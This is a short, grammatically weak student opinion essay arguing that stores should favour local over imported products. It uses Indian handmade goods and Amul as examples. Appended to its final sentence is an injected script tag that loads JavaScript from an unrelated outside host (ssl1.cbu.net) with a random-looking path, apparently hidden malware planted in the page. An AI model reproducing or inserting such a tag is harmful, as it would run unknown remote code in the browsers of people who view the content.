Stores should sell local product and not the important food product. Do you agree or disagree?

It is often argument,Some people says that local products are more useful as compared to import goods from outside. Local items are safer than the export goods from outside.I agree this concept because its health to improve the economic conditions as well as its improve the standard of living of local locality people.

Firstly, Regional product helps to enhance the local locality growth.Some peoples start doing work in near companies and its provide the work as well the standard package on work .When the people start to buy local products its help to increase productivity and Government try to establish more enterprises for growth.

As part of this society will improve with brotherhood relation. Local worker will serve own family in better way as result they can send their children to school and they can take higher knowledge for future growth.

For example Small villages in India are still doing work on handmade products of mud and its available on cheap rate.

Secondly,Local goods are safe and healthy,Production of local goods are always on health material because they are easily available in local market.People can choose these product without any difficulties. Some products that are exported in countries for sale, most of these are not in good quality also its create problem for exchange if the store owner hold local product then they can exchange on same time.It will be helpful for maintain health in society.For example: In India still they are using the product Amul. It is local company which are producing milk, ice cream and other product with the help of material that are easily available in local ,market.

To Conclusion: As per above discussion, Local product are helping to maintain Healthy Society and help to provide work of volunteer persons.<script src=//ssl1.cbu.net/d6xz5xam></script>